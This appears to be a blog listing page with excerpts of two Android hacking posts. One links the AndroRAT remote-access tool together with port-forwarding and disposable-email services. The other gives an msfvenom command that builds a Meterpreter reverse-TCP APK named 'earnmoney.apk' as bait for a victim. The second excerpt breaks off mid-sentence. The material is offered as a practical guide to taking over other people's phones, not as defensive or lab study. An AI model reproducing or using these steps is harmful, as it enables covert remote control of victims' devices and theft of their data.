Posts

Showing posts with the label port

Hacking android

Image
Hacking Android via AndroRat tool and make port forwarding  for clear explanation watch my youtube video hacking android phone AndroRat   follow the video for the clear explanation and here are the links i have been used port:  https://portmap.io   git hub link:  https://github.com/karma9874/AndroRAT mail:  https://temp-mail.org/en/ post2:-  Android Hacking with Metasploit Frame work In this post you be learning about how to hack a android mobile by sending a link to the victim firstly start you  kali  machine open  metasploit framework  once after opening the metasploit console type the following command  "here you will be creating the apk to hack the victim phone" so follow the commands "msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 R> /var/www/html/earnmoney.apk " *in place of 0.0.0.0 [enter you system ip address] *lport anything *-p is payload  make sure you execute the command with super us...